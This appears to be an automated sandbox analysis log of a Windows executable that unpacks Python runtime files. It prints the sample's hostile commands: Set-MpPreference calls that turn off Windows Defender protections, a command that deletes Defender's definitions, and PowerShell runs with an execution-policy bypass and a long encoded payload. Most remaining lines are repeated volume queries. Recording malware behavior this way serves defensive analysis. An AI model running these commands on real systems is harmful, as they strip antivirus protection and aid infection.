4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab

Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe

Code function: 83_2_00007FF6D7F1B340 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

83_2_00007FF6D7F1B340

Source: C:\Users\user\Desktop\El9HaBFrFM.exe

Code function: 0_2_00007FF6BA3C9570 cpuid

0_2_00007FF6BA3C9570

Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\_ctypes.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\_lzma.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\_bz2.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\_sqlite3.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Queries volume information: C:\Users\user\Desktop\El9HaBFrFM.exe VolumeInformation	Jump to behavior
